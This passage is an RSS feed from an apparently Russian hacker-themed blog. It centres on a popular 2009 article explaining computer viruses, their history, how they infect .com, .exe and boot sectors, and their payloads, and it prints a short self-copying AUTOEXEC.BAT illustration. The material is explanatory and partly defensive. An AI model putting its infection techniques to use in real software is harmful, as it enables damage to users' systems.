дошло только в июле 1992 г. Членов &lt;BR&gt;MoD обвинили по 11 пунктам, &quot;стоящих&quot; по 5 лет тюрьмы и $250.000 &lt;BR&gt;штрафа. Но, то ли благодаря хорошему адвокату, то ли неким &lt;BR&gt;смягчающим обстоятельствам, каждый получил не более года. &lt;BR&gt;Legion of Doom просуществовала вплоть до 1994 г. В это время отошли &lt;BR&gt;от хакерского сообщества немногие оставшиеся мемберы, и некогда &lt;BR&gt;могущественная группа просто исчезла. Оставшись в памяти пионеров &lt;BR&gt;тех времен, став неотъемлемой частью истории, превратившись в одну &lt;BR&gt;из главных легенд компьютерного андеграунда 80-х.&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/2009-02-19-40</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/2009-02-19-40</guid>
			<pubDate>Thu, 19 Feb 2009 06:03:59 GMT</pubDate>
		</item>
		<item>
			<title>Вирусы</title>
			<description>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/vvedenie_v_PC-bezopasnost.jpg&quot;&gt;Вирусы. Они бывают разные - например, грипп, гепатит, герпес; а бывают еще и&lt;BR&gt;компьютерные. Вот о них, родимых, и поговорим. Что же это такое - компьютерный вирус?&lt;BR&gt;&lt;BR&gt;Объяснений, что такое компьютерный вирус, можно привести несколько. Самое простое -&lt;BR&gt;бытовое объяснение для домохозяйки, которая ни разу в жизни компьютера не видела, но&lt;BR&gt;знает, что Он есть, и что в Нем водятся Вирусы. Объяснение будет дано на примере&lt;BR&gt;клерка, работающего исключительно с бумагами. Идея такого объяснения принадлежит&lt;BR&gt;Д.Н.Лозинскому.&lt;BR&gt;&lt;BR&gt;Представим себе аккуратного клерка, который приходит на работу, к себе в контору и&lt;BR&gt;каждый день обнаруживает у себя на столе стопку листов бумаги со списком заданий,&lt;BR&gt;которые он должен выполнить за рабочий день. Клерк берет верхний лист, читает указания&lt;BR&gt;начальства, пунктуально их выполняет, выбрасывает &quot;отработанный&quot; лист в мусорное ведро&lt;BR&gt;и переходит к следующему листу. Предположим, что некий злоумышлен...</description>
			<content:encoded>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/vvedenie_v_PC-bezopasnost.jpg&quot;&gt;Вирусы. Они бывают разные - например, грипп, гепатит, герпес; а бывают еще и&lt;BR&gt;компьютерные. Вот о них, родимых, и поговорим. Что же это такое - компьютерный вирус?&lt;BR&gt;&lt;BR&gt;Объяснений, что такое компьютерный вирус, можно привести несколько. Самое простое -&lt;BR&gt;бытовое объяснение для домохозяйки, которая ни разу в жизни компьютера не видела, но&lt;BR&gt;знает, что Он есть, и что в Нем водятся Вирусы. Объяснение будет дано на примере&lt;BR&gt;клерка, работающего исключительно с бумагами. Идея такого объяснения принадлежит&lt;BR&gt;Д.Н.Лозинскому.&lt;BR&gt;&lt;BR&gt;Представим себе аккуратного клерка, который приходит на работу, к себе в контору и&lt;BR&gt;каждый день обнаруживает у себя на столе стопку листов бумаги со списком заданий,&lt;BR&gt;которые он должен выполнить за рабочий день. Клерк берет верхний лист, читает указания&lt;BR&gt;начальства, пунктуально их выполняет, выбрасывает &quot;отработанный&quot; лист в мусорное ведро&lt;BR&gt;и переходит к следующему листу. Предположим, что некий злоумышленник тайком&lt;BR&gt;прокрадывается в контору и подкладывает в стопку бумаг лист, на котором написано&lt;BR&gt;следующее: &quot;Переписать этот лист два раза и положить копии в стопку заданий соседей&quot;.&lt;BR&gt;&lt;BR&gt;Что сделает клерк? Дважды перепишет лист, положит его соседям на стол, уничтожит&lt;BR&gt;оригинал и перейдет к выполнению второго листа из стопки, т.е. продолжит выполнять&lt;BR&gt;свою настоящую работу. Что сделают соседи, являясь такими же аккуратными клерками,&lt;BR&gt;обнаружив новое задание? То же, что и первый: перепишут его по два раза и раздадут&lt;BR&gt;другим клеркам. Итого, в конторе бродят уже четыре копии первоначального документа,&lt;BR&gt;которые и дальше будут копироваться и раздаваться на другие столы.&lt;BR&gt;&lt;BR&gt;Примерно так же работает и компьютерный вирус, только стопками бумаг-указаний являются&lt;BR&gt;программы, а клерком - компьютер. Так же как и клерк, компьютер аккуратно выполняет&lt;BR&gt;все команды программы (листы заданий), начиная с первой. Если же первая команда звучит&lt;BR&gt;как &quot;скопируй меня в две другие программы&quot;, то компьютер так и сделает, - и&lt;BR&gt;команда-вирус попадает в две другие программы. Когда компьютер перейдет к выполнению&lt;BR&gt;других &quot;зараженных&quot; программ, вирус тем же способом будет расходиться все дальше и&lt;BR&gt;дальше по всему компьютеру.&lt;BR&gt;&lt;BR&gt;В приведенном выше примере про клерка и его контору лист-вирус не проверяет, заражена&lt;BR&gt;очередная папка заданий или нет. В этом случае к концу рабочего дня контора будет&lt;BR&gt;завалена такими копиями, а клерки только и будут что переписывать один и тот же текст&lt;BR&gt;и раздавать его соседям - ведь первый клерк сделает две копии, очередные жертвы вируса&lt;BR&gt;- уже четыре, затем 8, 16, 32, 64 и т.д., т.е. количество копий каждый раз будет&lt;BR&gt;увеличиваться в два раза. Если клерк на переписывание одного листа тратит 30 секунд и&lt;BR&gt;еще 30 секунд на раздачу копий, то через час по конторе будет &quot;бродить&quot; более&lt;BR&gt;1.000.000.000.000.000.000 копий вируса! Скорее всего, конечно же, не хватит бумаги, и&lt;BR&gt;распространение вируса будет остановлено по столь банальной причине.&lt;BR&gt;&lt;BR&gt;Как это ни смешно (хотя участникам этого инцидента было совсем не смешно), именно&lt;BR&gt;такой случай произошел в 1988 году в Америке - несколько глобальных сетей передачи&lt;BR&gt;информации оказались переполненными копиями сетевого вируса (вирус Морриса), который&lt;BR&gt;рассылал себя от компьютера к компьютеру. Поэтому &quot;правильные&quot; вирусы делают так:&lt;BR&gt;&quot;Переписать этот лист два раза и положить копии в стопку заданий соседей, если у них&lt;BR&gt;еще нет этого листа&quot;. Проблема решена - &quot;перенаселения&quot; нет, но каждая стопка содержит&lt;BR&gt;по копии вируса, при этом клерки еще успевают справляться и с обычной работой.&lt;BR&gt;&lt;BR&gt;&quot;А как же уничтожение данных?&quot; - спросит хорошо эрудированная домохозяйка. Все очень&lt;BR&gt;просто - достаточно дописать на лист примерно следующее:&lt;BR&gt;1. Переписать этот лист два раза и положить копии в стопку заданий соседей, если у них&lt;BR&gt;еще нет этого листа.&lt;BR&gt;2. Посмотреть на календарь - если сегодня пятница, попавшая на 13-е число, выкинуть&lt;BR&gt;все документы в мусорную корзину.&lt;BR&gt;&lt;BR&gt;Кстати, на примере клерка очень хорошо видно, почему в большинстве случаев нельзя&lt;BR&gt;точно определить, откуда в компьютере появился вирус. Все клерки имеют одинаковые (с&lt;BR&gt;точностью до почерка) КОПИИ, но оригинал-то с почерком злоумышленника уже давно в&lt;BR&gt;корзине!&lt;BR&gt;&lt;BR&gt;Вот такое простое объяснение работы вируса. Плюс к нему хотелось бы привести две&lt;BR&gt;аксиомы, которые, как это ни странно, не для всех являются очевидными:&lt;BR&gt;Во-первых, вирусы не возникают сами собой - их создают программисты-хакеры и рассылают&lt;BR&gt;затем по сети или подкидывают на компьютеры знакомых. Вирус не может сам собой&lt;BR&gt;появиться на вашем компьютере - либо его подсунули на дискетах или даже на&lt;BR&gt;компакт-диске, либо вы его случайно скачали из компьютерной сети, либо вирус жил у вас&lt;BR&gt;в компьютере с самого начала.&lt;BR&gt;Во-вторых: компьютерные вирусы заражают только компьютер и ничего больше, поэтому не&lt;BR&gt;надо бояться - через клавиатуру и мышь они не передаются.&lt;BR&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/112870163007742.gif&quot;&gt;&lt;BR&gt;Теперь попробуем дать более точное определение вируса. Основная трудность, возникающая&lt;BR&gt;при попытках дать это определение, заключается в том, что практически все&lt;BR&gt;отличительные черты вируса (внедрение в другие объекты, скрытность, потенциальная&lt;BR&gt;опасность и проч.) либо присущи другим программам, которые никоим образом вирусами не&lt;BR&gt;являются, либо же существуют вирусы, которые не содержат указанных выше отличительных&lt;BR&gt;черт (за исключением возможности распространения).&lt;BR&gt;&lt;BR&gt;Например, если в качестве отличительной характеристики вируса принимается скрытность,&lt;BR&gt;то легко привести пример вируса, не скрывающего своего распространения. Такой вирус&lt;BR&gt;перед заражением любого файла выводит сообщение, гласящее, что в компьютере находится&lt;BR&gt;вирус и этот вирус готов поразить очередной файл, затем выводит имя этого файла и&lt;BR&gt;запрашивает разрешение пользователя на внедрение вируса в файл.&lt;BR&gt;&lt;BR&gt;Если в качестве отличительной черты вируса приводится возможность уничтожения им&lt;BR&gt;программ и данных на дисках, то в качестве контрпримера к данной отличительной черте&lt;BR&gt;можно привести десятки совершенно безобидных вирусов, которые кроме своего&lt;BR&gt;распространения ничем больше не отличаются.&lt;BR&gt;&lt;BR&gt;Основная же особенность компьютерных вирусов - возможность их самопроизвольного&lt;BR&gt;внедрения в различные объекты операционной системы - присуща многим программам,&lt;BR&gt;которые не являются вирусами. Например, операционная система MS-DOS имеет в себе все&lt;BR&gt;необходимое, чтобы самопроизвольно устанавливаться на не-DOS&apos;овские диски. Для этого&lt;BR&gt;достаточно на загрузочный флоппи-диск, содержащий DOS, записать файл AUTOEXEC.BAT&lt;BR&gt;следующего содержания:&lt;BR&gt;SYS A:&lt;BR&gt;COPY *.* A:&amp;#92;&lt;BR&gt;SYS B:&lt;BR&gt;COPY *.* B:&amp;#92;&lt;BR&gt;SYS C:&lt;BR&gt;COPY *.* C:&amp;#92;&lt;BR&gt;&lt;BR&gt;Модифицированная таким образом DOS сама станет самым настоящим вирусом с точки зрения&lt;BR&gt;практически любого существующего определения компьютерного вируса.&lt;BR&gt;&lt;BR&gt;Таким образом, первой из причин, не позволяющих дать точное определение вирусу,&lt;BR&gt;является невозможность однозначно выделить отличительные признаки, которые&lt;BR&gt;соответствовали бы только вирусам.&lt;BR&gt;&lt;BR&gt;Мнений по поводу даты рождения первого компьютерного вируса очень много. Доподлинно&lt;BR&gt;известно только одно: на машине Беббиджа его не было, а на Univac 1108 и IBM-360/370&lt;BR&gt;они уже были (&quot;Pervading Animal&quot; и &quot;Christmas tree&quot;). Таким образом, первый вирус&lt;BR&gt;появился где-то в самом начале 70-х или даже в конце 60-х годов, хотя &quot;вирусом&quot; его&lt;BR&gt;никто еще не называл.&lt;BR&gt;&lt;BR&gt;Поговорим о новейшей истории: &quot;Brain&quot;, &quot;Vienna&quot;, &quot;Cascade&quot; и далее. Те, кто начал&lt;BR&gt;работать на IBM-PC аж в середине 80-х, еще не забыли повальную эпидемию этих вирусов в&lt;BR&gt;1987-89 годах. Буквы сыпались на экранах, а толпы пользователей неслись к специалистам&lt;BR&gt;по ремонту дисплеев (сейчас все наоборот: винчестер сдох от старости, а валят на&lt;BR&gt;неизвестный передовой науке вирус). Затем компьютер заиграл чужеземный гимн &quot;Yankee&lt;BR&gt;Doodle&quot;, но чинить динамики уже никто не бросился - очень быстро разобрались, что это&lt;BR&gt;- вирус, да не один, а целый десяток.&lt;BR&gt;&lt;BR&gt;Так вирусы начали заражать файлы. Вирус &quot;Brain&quot; и скачущий по экрану шарик вируса&lt;BR&gt;&quot;Ping-pong&quot; ознаменовали победу вируса и над Boot-сектором.&lt;BR&gt;&lt;BR&gt;Время шло, вирусы плодились. Все они были чем-то похожи друг на друга, лезли в память,&lt;BR&gt;цеплялись к файлам и секторам, периодически убивали файлы, дискеты и винчестеры. Одним&lt;BR&gt;из первых &quot;откровений&quot; стал вирус &quot;Frodo.4096&quot; - файловый вирус-невидимка (стелс).&lt;BR&gt;Этот вирус перехватывал INT 21h и, при обращении через DOS к зараженным файлам,&lt;BR&gt;изменял информацию таким образом, что файл появлялся перед пользователем в&lt;BR&gt;незараженном виде. Но это была только надстройка вируса над MS-DOS. Не прошло и года,&lt;BR&gt;как электронные тараканы полезли внутрь ядра DOS (вирус-невидимка &quot;Beast.512&quot;). Идея&lt;BR&gt;невидимости продолжала приносить свой плоды и далее: летом 1991 года пронесся, кося&lt;BR&gt;компьютеры как бубонная чума, вирус &quot;Dir_II&quot;.&lt;BR&gt;&lt;BR&gt;Но бороться с невидимками было довольно просто: почистил RAM - и будь спокоен, ищи&lt;BR&gt;гада и лечи его на здоровье. Побольше хлопот доставляли самошифрующиеся вирусы,&lt;BR&gt;которые иногда встречались в очередных поступлениях в коллекции. Ведь для их&lt;BR&gt;идентификации и удаления приходилось писать специальные подпрограммы, отлаживать их.&lt;BR&gt;Но на это никто тогда не обращал внимания, пока... Пока не появились вирусы нового&lt;BR&gt;поколения, те, которые носят название полиморфик-вирусы. Эти вирусы используют другой&lt;BR&gt;подход к невидимости: они шифруются (в большинстве случаев), а в расшифровщике&lt;BR&gt;используют команды, которые могут не повторяться при заражении различных файлов.&lt;BR&gt;&lt;BR&gt;Первый полиморфный вирус появился в начале 90-х кодов - &quot;Chameleon&quot;, но по-настоящему&lt;BR&gt;серьезной проблема полиморфик-вирусов стала лишь год спустя - в апреле 1991-го, когда&lt;BR&gt;практически весь мир был охвачен эпидемией полиморфик-вируса &quot;Tequila&quot;.&lt;BR&gt;&lt;BR&gt;Год 1995-й, август. Все прогрессивное человечество, компания Microsoft и Билл Гейтс&lt;BR&gt;лично празднуют выход новой операционной системы Windows95. На фоне шумного торжества&lt;BR&gt;практически незамеченным прошло сообщение о появлении вируса, использующего&lt;BR&gt;принципиально новые методы заражения - вируса, заражающего документы Microsoft Word.&lt;BR&gt;&lt;BR&gt;А вирус, получивший к тому времени имя &quot;Concept&quot;, продолжал победное движение по&lt;BR&gt;планете. Появившись, скорее всего, в каком-то из подразделений Microsoft, &quot;Concept&quot; в&lt;BR&gt;мгновение ока завладел тысячами (если не миллионами) компьютеров. Это неудивительно,&lt;BR&gt;ведь передача текстов в формате MS Word стала де-факто одним из стандартов, а для&lt;BR&gt;того, чтобы заразиться вирусом, требуется всего лишь открыть зараженный документ, и&lt;BR&gt;все остальные документы, редактируемые в зараженном Word&apos;e, также оказываются&lt;BR&gt;зараженными. В результате, получив по Интернету зараженный файл и прочитав его,&lt;BR&gt;пользователь, не зная того сам, оказывался &quot;разносчиком заразы&quot;, и вся его переписка&lt;BR&gt;(если, конечно же, она велась при помощи MS Word) также оказывалась зараженной! Таким&lt;BR&gt;образом, возможность заражения MS Word, помноженная на скорость Интернета, стала одной&lt;BR&gt;из самых серьезных проблем за всю историю существования вирусов.&lt;BR&gt;&lt;BR&gt;Не прошло и года, как летом 1996-го года появился вирус &quot;Laroux&quot; (&quot;Лару&quot;), заражающий&lt;BR&gt;таблицы MS Excel. Как и в случае с вирусом &quot;Concept&quot;, новый макро-вирус был обнаружен&lt;BR&gt;&quot;в природе&quot; практически одновременно в разных фирмах. Кстати, в 1997 году этот вирус&lt;BR&gt;стал причиной эпидемии в Москве.&lt;BR&gt;&lt;BR&gt;В том же 1996 году появились первые конструкторы макро-вирусов, а в начале 1997 года&lt;BR&gt;появились первые полиморфик-макро-вирусы для MS-Word и первые вирусы для MS Office97.&lt;BR&gt;Плюс к тому непрерывно росло число разнообразных макро-вирусов, достигшее нескольких&lt;BR&gt;сотен к лету 1997-го.&lt;BR&gt;&lt;BR&gt;Так что же происходит, когда вирус попадает в машину?&lt;BR&gt;&lt;BR&gt;Так как вирус - программа, которую написал человек, то, естественно, как и все&lt;BR&gt;программы, он имеет структуру, которая присуща и другим вирусам. Что главное для&lt;BR&gt;вируса? Основным параметром вируса является размножение, если, конечно, его не писали&lt;BR&gt;для определенных целей, типа добавить денег на счет &quot;писателя&quot; в каком-то банке.&lt;BR&gt;Поэтому главный блок любого вируса - это блок размножения. Как же строится этот&lt;BR&gt;&quot;главный&quot; блок вируса? Сколько разных идей было придумано программистами в этих целях?&lt;BR&gt;В первых модификациях только &quot;заражали&quot; файлы .cом, .exe, .sys, т.е. те, которые&lt;BR&gt;непосредственно содержали исполнимый код. Это понятно, но как искать эти файлы, ведь&lt;BR&gt;на диске так много каталогов? Первые модели брали пути, которые они прописывают в&lt;BR&gt;переменной PATH, и по ним искали &quot;новые жертвы&quot;. Более поздние обыскивали весь диск,&lt;BR&gt;открывая по очередности все каталоги системы (очень долгий процесс, поэтому на&lt;BR&gt;компьютерах того времени это занимало довольно большой отрезок времени и сразу было&lt;BR&gt;видно - вирус). Позже стали делать &quot;резиденты-вирусы&quot;. Они &quot;вешались&quot; в памяти и&lt;BR&gt;следили за тем, что делает ДОС. Как только ловили обращение системы к какому-то файлу&lt;BR&gt;- мгновенно заражали этот файл-бедняжку. Вот так-то. С этим, вроде, решили (как найти&lt;BR&gt;жертвы).&lt;BR&gt;&lt;BR&gt;Теперь непосpедственно о заpажении. Спеpва поговоpим о .com виpусах, т.е. заpажающих&lt;BR&gt;.com файлы. Если вирус помещает свое тело в начале программы, его местоположение&lt;BR&gt;всегда жестко закреплено, при запуске этой зараженной программы он выполняется первым,&lt;BR&gt;при этом его легко &quot;поймать&quot;, притом после своей работы он должен возвращать ту часть&lt;BR&gt;программы, на месте которой он расположился. Если тело вируса лежит в середине, то его&lt;BR&gt;максимально трудно поймать и вылечить файл, так как необходимо вычислить, где именно&lt;BR&gt;он находится, зато у вируса возникают проблемы - необходимо переносить после работы на&lt;BR&gt;свое место блок, который был там до заражения. Еще один подводный камень для вируса,&lt;BR&gt;передача ему управления. Ему необходимо где-то в начале сделать пеpеход на точку&lt;BR&gt;выполнения, но вот только как делается такой пеpеход? Был придуман &quot;фиктивный&quot;&lt;BR&gt;переход. Первый из них - это дописать в начале программы переход типа jmp addr, где&lt;BR&gt;addr - точка запуска вируса, а после выполнения &quot;черных дел&quot; вирус вернет на место&lt;BR&gt;этого jmp-а старый код, но при просмотре программ эту подмену можно легко заметить.&lt;BR&gt;Поэтому сейчас применяют более изощренный метод. Дело в том, что команда jmp и call -&lt;BR&gt;очень распространенные команды, и их использует практически любая программа. Поэтому&lt;BR&gt;вирус ищет в начале программы код, соответствующий jmp addr или call addr и вместо&lt;BR&gt;адреса в операнде подставляет свой, а после своего выполнения делает переход на старый&lt;BR&gt;адрес. Увидеть подмену адреса - довольно сложный процесс. Если же тело вируса лежит в&lt;BR&gt;конце, то у вируса возникают проблемы с запуском и возможностью легкого обнаружения,&lt;BR&gt;но при этом нет необходимости переносить блоки, на месте которых находится вирус.&lt;BR&gt;&lt;BR&gt;Теперь немного о заражении .exe файлов. У них есть заголовок, в котором прописаны&lt;BR&gt;очень важные данные, как-то: требуемый размер памяти, сегмент стека, и, что более&lt;BR&gt;важно, точка запуска программы. Следовательно, эту точку можно поменять так, чтобы она&lt;BR&gt;как раз попадала на вирус, который может располагаться опять-таки, в трех местах (об&lt;BR&gt;этом говорилось выше). Теперь, казалось бы, берется метод заражения файла с допиской&lt;BR&gt;тела вируса в конец, и меняется точка запуска на точку запуска вируса. Но при таком&lt;BR&gt;расположение вируса его легко обнаружить (антивирусы ругают те программы, у которых&lt;BR&gt;точка пуска лежит в конце, ибо это редкость). Еще один камушек для вируса -&lt;BR&gt;существование у .exe файлов оверлеев, т.е. кусков кода, которые при запуске не&lt;BR&gt;грузятся в память, а их по необходимости подгружают в последствии. Так, если вирус&lt;BR&gt;цепляется в конце файла, то у него нет гарантии, что он будет находиться в памяти&lt;BR&gt;после запуска. Для этого находится абсолютный конец, т.е. такой участок, где&lt;BR&gt;заканчивается сама программа и начинаются оверлеи. Потом сюда вписывается вирус, а&lt;BR&gt;оверлеи сдвигают на длину вируса. Другие методы с допиской вируса в начало или&lt;BR&gt;середину тоже используются при написании .exe вирусов. Но они для запуска тела в коде&lt;BR&gt;программы уже ищут не jmp addr и call adrr, а jmp far addr и call far addr, т.к. .exe&lt;BR&gt;файлы нередко превышают длину одного сегмента. Не стоит забывать и о заражении boot и&lt;BR&gt;master-boot секторов. Этот способ повел за собой целую цепочку бутовых вирусов. Дело в&lt;BR&gt;том, что в boot-записи, которая, для незнающих, находится на диске, в 1 секторе, 0&lt;BR&gt;головке, 0 цилиндре, записана программа, которая &quot;загружает&quot; ОС. Эта программа&lt;BR&gt;пускается в самом начале работы, т.е. как только определено наличие жесткого диска.&lt;BR&gt;Именно программа, записанная в этой записи, &quot;выкрикивает&quot; известное сообщение: Non&lt;BR&gt;system disk or disk error!!!&lt;BR&gt;&lt;BR&gt;Так вот туда и помещают вирус, который получает управление еще до загрузки&lt;BR&gt;операционной системы. Конечно, он не может использовать дисковых операций на уровне&lt;BR&gt;DOS, но может, в крайнем случае, &quot;повесится&quot; резидентом в память. Следует заметить еще&lt;BR&gt;одну интересную вещь. При заражении &quot;умные&quot; вирусы стараются заразить, прежде всего,&lt;BR&gt;дискеты, т.к. эти дискеты могут перенести на другой компьютер и... тады ой.&lt;BR&gt;&lt;BR&gt;После блока заpажения идет втоpой уже &quot;необязательный&quot; блок - тот, котоpого боятся все&lt;BR&gt;пользователи. Это блок действия. Именно этот блок является &quot;пpиятной неожиданностью&quot; в&lt;BR&gt;pаботе виpуса. Обычно он запускается не сpазу. Только &quot;глупый&quot; виpус выдает свое&lt;BR&gt;пpисутствие сpазу. Умный сначала pазмножится так, чтобы система была уже &quot;обpечена&quot;, и&lt;BR&gt;узнает о существовании виpуса пользователь или нет - уже не имеет значения. Чаще всего&lt;BR&gt;в теле виpуса имеется некий счетчик (Counter), в котоpом учитывается число &quot;успешных&quot;&lt;BR&gt;заpажений. После того, как счетчик достигнет опpеделенного значения, идет запуск блока&lt;BR&gt;действия. А в еще более изощpенных модификациях существуют 2 счетчика. Пеpвый тоже&lt;BR&gt;содеpжит число заpаженных файлов, а втоpой - число заpаженных файлов на дискетах. И&lt;BR&gt;только когда оба счетчика достигнут опpеделенного значения, запускается блок действия.&lt;BR&gt;Зачем это делается? Да ведь если виpус, скажем, заpазит на жестском диске 1000 файлов&lt;BR&gt;и отфоpматиpует его, то он сам себя и убьет. И не достигнет основной цели - выжить.&lt;BR&gt;Именно содеpжимое блока действия создало такое pазнообpазие виpусов, что очень тpудно&lt;BR&gt;пеpечислить все модификации, но основные виды можно попpобовать. Пеpвый тип -&lt;BR&gt;безобидные демонстpатоpы. Они не делают ничего плохого, только мешают пользователю в&lt;BR&gt;pаботе. Скажем, вдpуг на экpане появляется кpасный теннисный мячик и, отбиваясь от&lt;BR&gt;символов, скачет по экpану. Или ни с того ни с сего начинают опадать буквы вниз (а-ля&lt;BR&gt;листопад). Далее следует гpуппа так называемых пугающих виpусов. В пpинципе их можно&lt;BR&gt;отнести к пеpвой гpуппе, но действие этих виpусов очень интеpесно. Они обычно очень&lt;BR&gt;пpавдиво и популяpно pассказывают пользователю о том, что сейчас, к пpимеpу, его&lt;BR&gt;жесткий диск будет отфоpматиpован. И потихоньку pисуют быстpо меняющийся индикатоp&lt;BR&gt;пpоцентов очищенного пpостpанства. Hовичок-пользователь увидев это (скоpее всего),&lt;BR&gt;потеpяет сознание или, что еще хуже, получит pазpыв сеpдца. Чаще всего, конечно, это&lt;BR&gt;шутки, хотя не всегда. Следом идет не менее обшиpная гpуппа так называемых pазpушающих&lt;BR&gt;виpусов. Их задачей, естественно, является pазpушение. Самое пpимитивное, что они&lt;BR&gt;могут сделать, это отфоpматиpовать жестский диск, дискету или стереть BIOS. Hо пpи&lt;BR&gt;этом виpус убьет и себя. Интеpеснее было бы сделать так, чтобы виpус показал свое&lt;BR&gt;пpисутствие, но в то же вpемя пользователь не мог так пpосто от него избавиться.&lt;BR&gt;Извpащенные умы нашли и здесь очень тонкий метод. Пpедставте себе каpтину: виpус&lt;BR&gt;закодиpовал вам жестский диск. И только в том случае, если виpус запущен и находится в&lt;BR&gt;памяти, DOS в состоянии пpочесть ту закодиpованную инфоpмацию. Таким обpазом,&lt;BR&gt;пользователь пpосто обязан запускать виpус. Тем самым виpусописатель достиг высшей&lt;BR&gt;стадии, когда уже виpус не должен искать лазейки для своего запуска, а сам&lt;BR&gt;пользователь уже его запускает. Вот это метод! Или, скажем, считать FAT и скопиpовать&lt;BR&gt;его в абсолютно дpугое место на диске, а на его месте написать всякую белибеpду. Опять&lt;BR&gt;же без запуска виpуса у пользователя система не будет коppектно pаботать.&lt;BR&gt;&lt;BR&gt;Каждый день появляются новые вирусы, и это неизбежное зло. Стопроцентной гарантии от&lt;BR&gt;заражения не даст никто. Хотя есть один способ. Забить во флоп чопик, сидюк&lt;BR&gt;использовать только как подставку под кофе, сетевую карточку выбросить, а модем отдать&lt;BR&gt;врагу, пусть мучается. Но это все уже для параноиков. Не так страшен черт, как его&lt;BR&gt;малюют, особенно если про него знаешь.&lt;BR&gt;&lt;BR&gt;И напоследок небольшая памятка:&lt;BR&gt;* виpус не может пеpедаться по воздуху или чеpез дpугую сpеду, его можно только&lt;BR&gt;пpинести на дискете, скачать из Сети или загpузить с жесткого диска, запустив&lt;BR&gt;заpаженный файл;&lt;BR&gt;* если компьютеp стоит выключенный, то виpусы не могут ничего там испоpтить;&lt;BR&gt;* если вы пpосто вставили дискету и не запустили с нее ни одного файла, а также не&lt;BR&gt;стаpтовали с нее систему, то виpус с дискеты не попадет в компьютеp, т.е. вы&lt;BR&gt;можете смело пpосматpивать содеpжимое дискет, не боясь заpажений;&lt;BR&gt;* по сети нельзя пpосто так заpазиться виpусом. Можно только получить заpазный файл,&lt;BR&gt;котоpый заpазит ваш компьютеp только после своего запуска;&lt;BR&gt;* если наступила пятница 13, а вы вчеpа пpовеpяли компьтеp на наличие виpусов, то&lt;BR&gt;смело запускайте компьютеp, это не такой уж знаменательный день. Виpус может&lt;BR&gt;активизиpоватся и, напpимеp, 23 июля;&lt;BR&gt;* не веpьте сплетням о том, что виpусы pазpушили у кого-то &quot;железо&quot; на компе. Все&lt;BR&gt;это бpед, максимум, что возможно, так это отфоpматиpовать носитель, ну или стиреть&lt;BR&gt;BIOS;&lt;BR&gt;* и вообще, если вы будете пpовеpять антивиpусными сpедствами все пpиходящие файлы&lt;BR&gt;(на дисках и/или по сети), и pаз в неделю пpовеpять весь компьютеp, то смело&lt;BR&gt;можете не боятся виpусов;&lt;BR&gt;* если уж виpус на вашем компе, то не отчаивайтесь, а запустите антивиpус;&lt;BR&gt;* если антивиpус обнаpужил и излечил файлы на вашем компе от виpусов, а они вскоpе&lt;BR&gt;опять появились, то подумайте, что вы успели поназапускать за пpошедшее от момента&lt;BR&gt;тестиpования вpемя. Если вы pаспаковывали аpхив и запускали файлы из него, значит&lt;BR&gt;навеpняка там виpус и сидит. Hе в файле-аpхиве, а в зааpхивиpованном в нем файле.&lt;BR&gt;Hеобходимо pаспаковать аpхив, пpовеpить и снова запаковать;&lt;BR&gt;* постоянно обновляйте антивирусные базы;&lt;BR&gt;* если вы получили вирус по почте, не стоит писать в ответ гневное письмо - скорее&lt;BR&gt;всего, отправитель сам стал жертвой, а вирус отослал себя сам, с его машины, найдя&lt;BR&gt;ваш почтовый адрес в базе компьютера.&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/2009-02-19-39</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/2009-02-19-39</guid>
			<pubDate>Thu, 19 Feb 2009 05:55:08 GMT</pubDate>
		</item>
		<item>
			<title>Видит Бог, я этого не хотел...</title>
			<description>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/7DNEI.JPG&quot;&gt;Накрутка счетчика - мошенничество, целью которого является &lt;BR&gt;завладение денежными средствами рекламодателя посредством создания &lt;BR&gt;иллюзии популярности интернет-ресурса и основанное на доверии &lt;BR&gt;рекламодателя к рейтинговым системам.&lt;BR&gt;Почему я это публикую&lt;BR&gt;26 апреля 2002 года я обнаружил, что на Mail.ru вместо нормальной &lt;BR&gt;статистики ресурса, над которым я работаю, появилось сообщение &lt;BR&gt;&quot;Ресурс не участвует в рейтинге. Причина: накрутка счетчика&quot; &lt;BR&gt;(выделено мной). Естественно, я сразу же посылаю письмо по &lt;BR&gt;указанному адресу с просьбой дать объяснения, жду час, другой, сутки &lt;BR&gt;- нет ответа. Посылаю письмо с запросом квитка, снова терпеливо жду &lt;BR&gt;несколько часов и ни квитка, ни ответа. Тогда нахожу адреса других &lt;BR&gt;служб Mail.ru и повторяю письмо с просьбой передать его &lt;BR&gt;&quot;рейтингистам&quot;. В письме я просил объясниться и представить мне &lt;BR&gt;доказательства мошенничества, поскольку обвинение лица в &lt;BR&gt;мошенничестве без достаточных на то осн...</description>
			<content:encoded>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/7DNEI.JPG&quot;&gt;Накрутка счетчика - мошенничество, целью которого является &lt;BR&gt;завладение денежными средствами рекламодателя посредством создания &lt;BR&gt;иллюзии популярности интернет-ресурса и основанное на доверии &lt;BR&gt;рекламодателя к рейтинговым системам.&lt;BR&gt;Почему я это публикую&lt;BR&gt;26 апреля 2002 года я обнаружил, что на Mail.ru вместо нормальной &lt;BR&gt;статистики ресурса, над которым я работаю, появилось сообщение &lt;BR&gt;&quot;Ресурс не участвует в рейтинге. Причина: накрутка счетчика&quot; &lt;BR&gt;(выделено мной). Естественно, я сразу же посылаю письмо по &lt;BR&gt;указанному адресу с просьбой дать объяснения, жду час, другой, сутки &lt;BR&gt;- нет ответа. Посылаю письмо с запросом квитка, снова терпеливо жду &lt;BR&gt;несколько часов и ни квитка, ни ответа. Тогда нахожу адреса других &lt;BR&gt;служб Mail.ru и повторяю письмо с просьбой передать его &lt;BR&gt;&quot;рейтингистам&quot;. В письме я просил объясниться и представить мне &lt;BR&gt;доказательства мошенничества, поскольку обвинение лица в &lt;BR&gt;мошенничестве без достаточных на то оснований в средстве массовой &lt;BR&gt;информации, может быть расценено лицом, как распространение &lt;BR&gt;средством массовой информации ложных сведений (измышлений) о лице с &lt;BR&gt;целью нанесения лицу публичного оскорбления. &lt;BR&gt;Наконец-то был получен первый ответ. 